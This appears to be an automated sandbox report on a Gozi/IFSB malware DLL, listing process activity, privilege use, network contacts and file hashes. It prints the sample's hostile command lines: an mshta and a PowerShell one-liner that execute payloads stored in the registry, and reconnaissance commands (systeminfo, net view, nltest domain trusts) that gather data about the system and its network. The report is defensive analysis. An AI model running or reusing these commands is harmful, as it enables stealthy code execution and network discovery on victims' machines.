Analysis Overview
SHA256
7dae6d6fb339b6114ffdd3c0b6bcaa2c9dab0a73979fec029801e9e16d7d06bc
Threat Level: Known bad
The file de00c4750accf516704b8c0df265c24a was found to be: Known bad.
Malicious Activity Summary
Gozi, Gozi IFSB
Checks computer location settings
Suspicious use of SetThreadContext
Enumerates physical storage devices
Suspicious use of WriteProcessMemory
Suspicious use of SetWindowsHookEx
Suspicious behavior: GetForegroundWindowSpam
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Enumerates processes with tasklist
Runs net.exe
Suspicious use of FindShellTrayWindow
Gathers system information
Suspicious behavior: MapViewOfSection
Discovers systems in the same network
MITRE ATT&CK
Enterprise Matrix V6
Analysis: static1
Detonation Overview
Reported
2022-08-03 17:54
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2022-08-03 17:54
Reported
2022-08-03 17:56
Platform
win7-20220715-en
Max time kernel
44s
Max time network
48s
Command Line
Signatures
Gozi, Gozi IFSB
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1432 wrote to memory of 1532 | N/A | C:\Windows\system32\regsvr32.exe | C:\Windows\SysWOW64\regsvr32.exe |
| PID 1432 wrote to memory of 1532 | N/A | C:\Windows\system32\regsvr32.exe | C:\Windows\SysWOW64\regsvr32.exe |
| PID 1432 wrote to memory of 1532 | N/A | C:\Windows\system32\regsvr32.exe | C:\Windows\SysWOW64\regsvr32.exe |
| PID 1432 wrote to memory of 1532 | N/A | C:\Windows\system32\regsvr32.exe | C:\Windows\SysWOW64\regsvr32.exe |
| PID 1432 wrote to memory of 1532 | N/A | C:\Windows\system32\regsvr32.exe | C:\Windows\SysWOW64\regsvr32.exe |
| PID 1432 wrote to memory of 1532 | N/A | C:\Windows\system32\regsvr32.exe | C:\Windows\SysWOW64\regsvr32.exe |
| PID 1432 wrote to memory of 1532 | N/A | C:\Windows\system32\regsvr32.exe | C:\Windows\SysWOW64\regsvr32.exe |
Processes
C:\Windows\system32\regsvr32.exe
regsvr32 /s C:\Users\Admin\AppData\Local\Temp\de00c4750accf516704b8c0df265c24a.dll
C:\Windows\SysWOW64\regsvr32.exe
/s C:\Users\Admin\AppData\Local\Temp\de00c4750accf516704b8c0df265c24a.dll
Network
Files
memory/1432-54-0x000007FEFBE91000-0x000007FEFBE93000-memory.dmp
memory/1532-55-0x0000000000000000-mapping.dmp
memory/1532-56-0x0000000076031000-0x0000000076033000-memory.dmp
memory/1532-57-0x0000000010000000-0x000000001000E000-memory.dmp
memory/1532-62-0x0000000000490000-0x000000000049D000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2022-08-03 17:54
Reported
2022-08-03 17:56
Platform
win10v2004-20220721-en
Max time kernel
150s
Max time network
153s
Command Line
Signatures
Gozi, Gozi IFSB
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000\Control Panel\International\Geo\Nation | C:\Windows\System32\mshta.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 368 set thread context of 2228 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\Explorer.EXE |
| PID 2228 set thread context of 3408 | N/A | C:\Windows\Explorer.EXE | C:\Windows\System32\RuntimeBroker.exe |
| PID 2228 set thread context of 3608 | N/A | C:\Windows\Explorer.EXE | C:\Windows\System32\RuntimeBroker.exe |
| PID 2228 set thread context of 3144 | N/A | C:\Windows\Explorer.EXE | C:\Windows\System32\RuntimeBroker.exe |
| PID 2228 set thread context of 4356 | N/A | C:\Windows\Explorer.EXE | C:\Windows\System32\RuntimeBroker.exe |
| PID 2228 set thread context of 4112 | N/A | C:\Windows\Explorer.EXE | C:\Windows\syswow64\cmd.exe |
Enumerates physical storage devices
Discovers systems in the same network
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\net.exe | N/A |
| N/A | N/A | C:\Windows\system32\net.exe | N/A |
| N/A | N/A | C:\Windows\system32\net.exe | N/A |
Enumerates processes with tasklist
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
Gathers system information
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\systeminfo.exe | N/A |
Runs net.exe
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 36 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 36 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\tasklist.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\RuntimeBroker.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
C:\Windows\system32\regsvr32.exe
regsvr32 /s C:\Users\Admin\AppData\Local\Temp\de00c4750accf516704b8c0df265c24a.dll
C:\Windows\SysWOW64\regsvr32.exe
/s C:\Users\Admin\AppData\Local\Temp\de00c4750accf516704b8c0df265c24a.dll
C:\Windows\System32\mshta.exe
"C:\Windows\System32\mshta.exe" "about:<hta:application><script>Fvgb='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Fvgb).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\EE2128B7-7580-5017-6F02-79841356BDF8\\\ChipUrls'));if(!window.flag)close()</script>"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name rxgwsyrt -value gp; new-alias -name mjbjtinden -value iex; mjbjtinden ([System.Text.Encoding]::ASCII.GetString((rxgwsyrt "HKCU:Software\AppDataLow\Software\Microsoft\EE2128B7-7580-5017-6F02-79841356BDF8").BlackVirtual))
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\tjqwukuz\tjqwukuz.cmdline"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESFAD0.tmp" "c:\Users\Admin\AppData\Local\Temp\tjqwukuz\CSCC10E6909227340609AFC522872CD7CB3.TMP"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\evo4kxhq\evo4kxhq.cmdline"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESFB9B.tmp" "c:\Users\Admin\AppData\Local\Temp\evo4kxhq\CSCAD08408EB8DB4D1EA4C66DC9C3D7502F.TMP"
C:\Windows\system32\cmd.exe
cmd /C "wmic computersystem get domain |more > C:\Users\Admin\AppData\Local\Temp\C84E.bin1"
C:\Windows\syswow64\cmd.exe
"C:\Windows\syswow64\cmd.exe" /C pause dll mail, ,
C:\Windows\System32\Wbem\WMIC.exe
wmic computersystem get domain
C:\Windows\system32\more.com
more
C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\C84E.bin1"
C:\Windows\system32\cmd.exe
cmd /C "systeminfo.exe > C:\Users\Admin\AppData\Local\Temp\C84E.bin1"
C:\Windows\system32\systeminfo.exe
systeminfo.exe
C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\C84E.bin1"
C:\Windows\system32\cmd.exe
cmd /C "net view >> C:\Users\Admin\AppData\Local\Temp\C84E.bin1"
C:\Windows\system32\net.exe
net view
C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\C84E.bin1"
C:\Windows\system32\cmd.exe
cmd /C "nslookup 127.0.0.1 >> C:\Users\Admin\AppData\Local\Temp\C84E.bin1"
C:\Windows\system32\nslookup.exe
nslookup 127.0.0.1
C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\C84E.bin1"
C:\Windows\system32\cmd.exe
cmd /C "tasklist.exe /SVC >> C:\Users\Admin\AppData\Local\Temp\C84E.bin1"
C:\Windows\system32\tasklist.exe
tasklist.exe /SVC
C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\C84E.bin1"
C:\Windows\system32\cmd.exe
cmd /C "driverquery.exe >> C:\Users\Admin\AppData\Local\Temp\C84E.bin1"
C:\Windows\system32\driverquery.exe
driverquery.exe
C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\C84E.bin1"
C:\Windows\system32\cmd.exe
cmd /C "reg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s >> C:\Users\Admin\AppData\Local\Temp\C84E.bin1"
C:\Windows\system32\reg.exe
reg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s
C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\C84E.bin1"
C:\Windows\system32\cmd.exe
cmd /C "net config workstation >> C:\Users\Admin\AppData\Local\Temp\C84E.bin1"
C:\Windows\system32\net.exe
net config workstation
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 config workstation
C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\C84E.bin1"
C:\Windows\system32\cmd.exe
cmd /C "nltest /domain_trusts >> C:\Users\Admin\AppData\Local\Temp\C84E.bin1"
C:\Windows\system32\nltest.exe
nltest /domain_trusts
C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\C84E.bin1"
C:\Windows\system32\cmd.exe
cmd /C "nltest /domain_trusts /all_trusts >> C:\Users\Admin\AppData\Local\Temp\C84E.bin1"
C:\Windows\system32\nltest.exe
nltest /domain_trusts /all_trusts
C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\C84E.bin1"
C:\Windows\system32\cmd.exe
cmd /C "net view /all /domain >> C:\Users\Admin\AppData\Local\Temp\C84E.bin1"
C:\Windows\system32\net.exe
net view /all /domain
C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\C84E.bin1"
C:\Windows\system32\cmd.exe
cmd /C "net view /all >> C:\Users\Admin\AppData\Local\Temp\C84E.bin1"
C:\Windows\system32\net.exe
net view /all
C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\C84E.bin1"
C:\Windows\system32\cmd.exe
cmd /U /C "type C:\Users\Admin\AppData\Local\Temp\C84E.bin1 > C:\Users\Admin\AppData\Local\Temp\C84E.bin & del C:\Users\Admin\AppData\Local\Temp\C84E.bin1"
Network
| Country | Destination | Domain | Proto |
| US | 13.107.42.16:80 | config.edge.skype.com | tcp |
| RO | 37.120.206.71:80 | 37.120.206.71 | tcp |
| RU | 5.42.199.72:80 | 5.42.199.72 | tcp |
| RO | 37.120.206.91:80 | 37.120.206.91 | tcp |
| IE | 20.190.159.23:443 | tcp | |
| DE | 185.212.47.98:8080 | tcp | |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 1.0.0.127.in-addr.arpa | udp |
| NL | 13.69.109.131:443 | tcp |
Files
memory/3396-130-0x0000000000000000-mapping.dmp
memory/3396-131-0x0000000010000000-0x000000001000E000-memory.dmp
memory/3396-136-0x00000000024B0000-0x00000000024BD000-memory.dmp
memory/368-140-0x0000000000000000-mapping.dmp
memory/368-141-0x000002B7F1AE0000-0x000002B7F1B02000-memory.dmp
memory/368-142-0x00007FFFDE2C0000-0x00007FFFDED81000-memory.dmp
memory/4084-143-0x0000000000000000-mapping.dmp
\??\c:\Users\Admin\AppData\Local\Temp\tjqwukuz\tjqwukuz.cmdline
| MD5 | 6e643d9fe9f1aac860a49e946a8c1232 |
| SHA1 | c7d2d4618b3995fe915769ad5af4db5f16e20b49 |
| SHA256 | b576b3445b689a1f91fd59405021e742167b6d8b89b57e23f06c1191b2ebca4f |
| SHA512 | 0a620b6ea4ff2ea42849ce5faf70d0178acd87acad39fddfe5ea025374897ad72ab732e1b6e4cd01e7e70ce7d0cccdd32fb5d177a5659c356314ffa10b4936d1 |
\??\c:\Users\Admin\AppData\Local\Temp\tjqwukuz\tjqwukuz.0.cs
| MD5 | 9a10482acb9e6952b96f4efc24d9d783 |
| SHA1 | 5cfc9bf668351df25fcda98c3c2d0bb056c026c3 |
| SHA256 | a0424e1530f002761a882c19c22504153a5e86d7fbb41391e940452bfa15f377 |
| SHA512 | e932914ad99d7bd39561e020d1e8c1f4e175c16eae66df720100c65e40ccc3383b5145f703432885f3f1ce080e8a4feb045ddd5c8bbc2f3231c619d04182ac28 |
memory/1064-146-0x0000000000000000-mapping.dmp
\??\c:\Users\Admin\AppData\Local\Temp\tjqwukuz\CSCC10E6909227340609AFC522872CD7CB3.TMP
| MD5 | 42ef9a91f67553f563161947d535ef3b |
| SHA1 | aaea4d23d8ef75b0375b71dbb44e802073930522 |
| SHA256 | 5b15566fc0f44fd1340273791069e308e09966dd9f90d85a4059bff524380d74 |
| SHA512 | c63eb24bae1149a90b4e4d7c82e3e1d8b92407ffd34970aca08f02a8870b63ea5654390894d9a96d60da565534c5d69f5de9bc1b4e1a1e644ddd7167d2d84eb8 |
C:\Users\Admin\AppData\Local\Temp\RESFAD0.tmp
| MD5 | 2bba2d3a3f5eceaf9fd5982bb1f4ffcd |
| SHA1 | 2069afb8433594dea4bed313bca99e13a936ff86 |
| SHA256 | e5e40879b657dc1a235ab7e907e4e500745b973e7bd411d0da7fd66469dcf473 |
| SHA512 | 6e1bc08b6776cd917f7e0507c6aa9d05e1db5e68ecdcc15a331963bbe243b1d0a6766cde21de0dbc279b261d66db8d434005dabe7df2ada7c689c60fff31e18e |
C:\Users\Admin\AppData\Local\Temp\tjqwukuz\tjqwukuz.dll
| MD5 | 81b10bf3c350962d2233c36f83b9b5cc |
| SHA1 | 9184d8b0b3bba3fd0ba487951c6e04076ac32e6b |
| SHA256 | 537fc2fb17715d732b3e178440ba4f1eceee6d19cf86124d03acddedd0284b0e |
| SHA512 | 945749003a229d9f06396f9cc22565a9eae231e2638e8f63bb53306f9b5d8558756c028115a6d183bbf64ec54b4858e44b3f8624fb4d145e4a2b12b9525e222b |
memory/1228-150-0x0000000000000000-mapping.dmp
\??\c:\Users\Admin\AppData\Local\Temp\evo4kxhq\evo4kxhq.cmdline
| MD5 | 9ca18ab2995b73c72e7817543c0fff70 |
| SHA1 | a4721405b5572fb18f099745c2279a830e73238c |
| SHA256 | cad1b8d2e4f37544daed6d945ccca3538cb8b737d2fe50fe76ce83316c6747ab |
| SHA512 | 48a7cdf7ccac04eeb9e76405d3c205af448373eb6d10817d3a365e3ce0530f453bf8c86611dcc3f03c8bf4ae81f3637b56c30bae4660577f3e1475e8191a0341 |
\??\c:\Users\Admin\AppData\Local\Temp\evo4kxhq\evo4kxhq.0.cs
| MD5 | aca9704199c51fde14b8bf8165bc2a4c |
| SHA1 | 789b408ccad29240bd093515cbd19a199ad2c1c8 |
| SHA256 | cb3da8a9768252634f8ed4c62e026dc8217b055e00f11b6012a52ed130c92c27 |
| SHA512 | a8c1df598581f508ecbf1e516744f11abfb71ec6bb9895d0b61f15e70e56e27cb40b4e5395b9411b787f8bb4f264ca704d815260677909dc1e599d601d0b5de6 |
memory/4548-153-0x0000000000000000-mapping.dmp
\??\c:\Users\Admin\AppData\Local\Temp\evo4kxhq\CSCAD08408EB8DB4D1EA4C66DC9C3D7502F.TMP
| MD5 | a6d74924723e76680e8eb3e419d13343 |
| SHA1 | b2e2905937d4c2f74fb0eb8ae61bedf291b6fc2e |
| SHA256 | 7e3e3ba1953bfeec758ef0450f0e999f6a9d24fec6129dc9f97853b2b962a84b |
| SHA512 | 8fcae4ebdd846237d249fa588e2dc548bb3342938037dd74d528e76ba298a13207f9265c17e78c6953f9a789bfe8c13d3ea6dbb30b2344e7c784ec207f01991c |
C:\Users\Admin\AppData\Local\Temp\RESFB9B.tmp
| MD5 | f624c26689ff72265aa896cf3005bb01 |
| SHA1 | c9367117bba69f3fc1027b8931b6e3c57c647145 |
| SHA256 | de26947e3348391f149a7f5f86fb7b006e83a70516f79f6b0908791522697070 |
| SHA512 | 82252d90f2f8539431de92e3d835b4569791b9765c7d6361a6135ac2998865a852a70e37f368e9d7f0e8bc9a14da335bdddc1c2465bfeb2be4d16709691b88eb |
C:\Users\Admin\AppData\Local\Temp\evo4kxhq\evo4kxhq.dll
| MD5 | c9d90e6b02ab7f881a79564586b2fb95 |
| SHA1 | 3d3976c7a2feb10c9e03277c282c26488b7a9162 |
| SHA256 | 4e6621efa5ae5f0f62af82730200001aa72f8fbd2c12cd4afa5b12965ed1e8e2 |
| SHA512 | dedde1ce90d2646562ee2de46533721440fff126ca51dd601ae3f074ac275d6aeeb6eeed072eabc0ce1894f28decac0b87696bf285050b024d3b237e0c7d5603 |
memory/368-157-0x000002B7F1B80000-0x000002B7F1BBD000-memory.dmp
memory/2228-159-0x00000000084D0000-0x0000000008573000-memory.dmp
memory/368-158-0x00007FFFDE2C0000-0x00007FFFDED81000-memory.dmp
memory/2028-160-0x0000000000000000-mapping.dmp
memory/4112-161-0x0000000000000000-mapping.dmp
memory/3036-162-0x0000000000000000-mapping.dmp
memory/4648-163-0x0000000000000000-mapping.dmp
memory/3408-164-0x00000212CE110000-0x00000212CE1B3000-memory.dmp
memory/3608-165-0x00000136866D0000-0x0000013686773000-memory.dmp
memory/3144-166-0x000001DEAC9D0000-0x000001DEACA73000-memory.dmp
memory/4112-168-0x0000000000DA6B20-0x0000000000DA6B24-memory.dmp
memory/4356-167-0x000002C74A9D0000-0x000002C74AA73000-memory.dmp
memory/4112-169-0x0000000000920000-0x00000000009B6000-memory.dmp
memory/4524-170-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\C84E.bin1
| MD5 | f7aea2435aa888b709ca20f816c33bfd |
| SHA1 | 38717c9a73b5f8bd399839cbe0aa57518427e758 |
| SHA256 | f0c30a157e0a0ea84b114c2b66a66d444a3824c2bfe7829d929b40e6548fa5d5 |
| SHA512 | 1ea828fc1932c97f5ba5f6ebf05f2816d4d89f003b094f2d0868d54f52b53774437037e2c8837e97b820d5f2e5d5707825b048a9ab2af261af00810f01bd8232 |
memory/4496-172-0x0000000000000000-mapping.dmp
memory/3512-174-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\C84E.bin1
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
memory/2228-175-0x0000000008CA0000-0x0000000008DDB000-memory.dmp
memory/2228-179-0x000000000A3B0000-0x000000000A4EA000-memory.dmp
memory/2228-183-0x000000000A4F0000-0x000000000A5FC000-memory.dmp
memory/632-187-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\C84E.bin1
| MD5 | c5fdae5ce528921debb77ec3a788f5d9 |
| SHA1 | b781445e7448511a05676d2f9beb917eab07840b |
| SHA256 | a0efd156fdd7213c77221a000f592b13f0b3002a0d08dd973ca067a1973af37d |
| SHA512 | 5cf5fde0ca29443393eaa011c4f9d4b82e0e6c143533aa37f117971e44b685d0fb7d5cc9001e51e643310ab51477021e185005fe4d5651b5192cb04c56211672 |
memory/5076-189-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\C84E.bin1
| MD5 | 69ad62f9a6cdb4bdd48d821965911723 |
| SHA1 | 2f47ada4cfbdff3c90b00738dcb673f350242211 |
| SHA256 | cd0b2c087c0edfbc5deca4ed2dd590e579cf2f36a5c5abe600f12e5f8b1d0e14 |
| SHA512 | 4b7c107289605c9b3258fa0f3fe37f034cf2ffeba25e7fccc6b6c8ece8fb8ca5b0df818293cd3a98665c67230264ec4754103cfe74dd58fba8199fe17b4e6204 |
memory/3936-191-0x0000000000000000-mapping.dmp
memory/2228-192-0x00000000084D0000-0x0000000008573000-memory.dmp
memory/3564-193-0x0000000000000000-mapping.dmp
memory/1960-194-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\C84E.bin1
| MD5 | 95095ab4f924068a35994172fd75caa9 |
| SHA1 | 97c7b4453a047aec9a08d08b8f5c3502e1a3026a |
| SHA256 | a5031a299f19664e1824fc66c9bf8e7971367b3f7a3ed281598d5b689cb0f36a |
| SHA512 | 50dccef47c5b5fbf634c7a6839b434d9b3e8ac15be4bd1a9bed1011a5ed6ade89c832d29fcdd85efe9965572631e76b8966df530a701d24472a80f2918fcde9a |
memory/4004-196-0x0000000000000000-mapping.dmp
memory/1968-197-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\C84E.bin1
| MD5 | 5aee054b73a165dd06364a6cadf97d37 |
| SHA1 | 88c158780170981eb959a4dcdc33de04d6eba459 |
| SHA256 | 5e79f3109fd902d8fe85cfaca98784a66dc057602b911cc53a0701343d42fc76 |
| SHA512 | 3f79d63a425dc3eb873350c312bc4d1d9b7f9d47c23d0c5d543b5df5f0a016dce955b110f6b21a4683281d643b5478aa495553808dc3a5e109cdebc8c9288d88 |
memory/4940-199-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\C84E.bin1
| MD5 | 5aee054b73a165dd06364a6cadf97d37 |
| SHA1 | 88c158780170981eb959a4dcdc33de04d6eba459 |
| SHA256 | 5e79f3109fd902d8fe85cfaca98784a66dc057602b911cc53a0701343d42fc76 |
| SHA512 | 3f79d63a425dc3eb873350c312bc4d1d9b7f9d47c23d0c5d543b5df5f0a016dce955b110f6b21a4683281d643b5478aa495553808dc3a5e109cdebc8c9288d88 |
memory/4352-201-0x0000000000000000-mapping.dmp
memory/3404-202-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\C84E.bin1
| MD5 | 521fcaee7ce20f173abb6bdfabd0c4fc |
| SHA1 | 55e53f3fe041e2cda4e1fa05ab0bfc07595fef65 |
| SHA256 | 5059bbf9e1259bdfc70ac9b422f617be80837f6f10e79326a212a3886399dbc6 |
| SHA512 | be139025ab23374f8629e296fc841cc64cc4b453bfbe2a136ef5b495e0e0491a7edd40ee706d06f2770fa737b337e900dba1d3a6aaa24eb191f2a790cfc04342 |
memory/3068-204-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\C84E.bin1
| MD5 | 521fcaee7ce20f173abb6bdfabd0c4fc |
| SHA1 | 55e53f3fe041e2cda4e1fa05ab0bfc07595fef65 |
| SHA256 | 5059bbf9e1259bdfc70ac9b422f617be80837f6f10e79326a212a3886399dbc6 |
| SHA512 | be139025ab23374f8629e296fc841cc64cc4b453bfbe2a136ef5b495e0e0491a7edd40ee706d06f2770fa737b337e900dba1d3a6aaa24eb191f2a790cfc04342 |
memory/4932-206-0x0000000000000000-mapping.dmp
memory/2444-207-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\C84E.bin1
| MD5 | 2024b2d8818db6b77b329d6c9655560a |
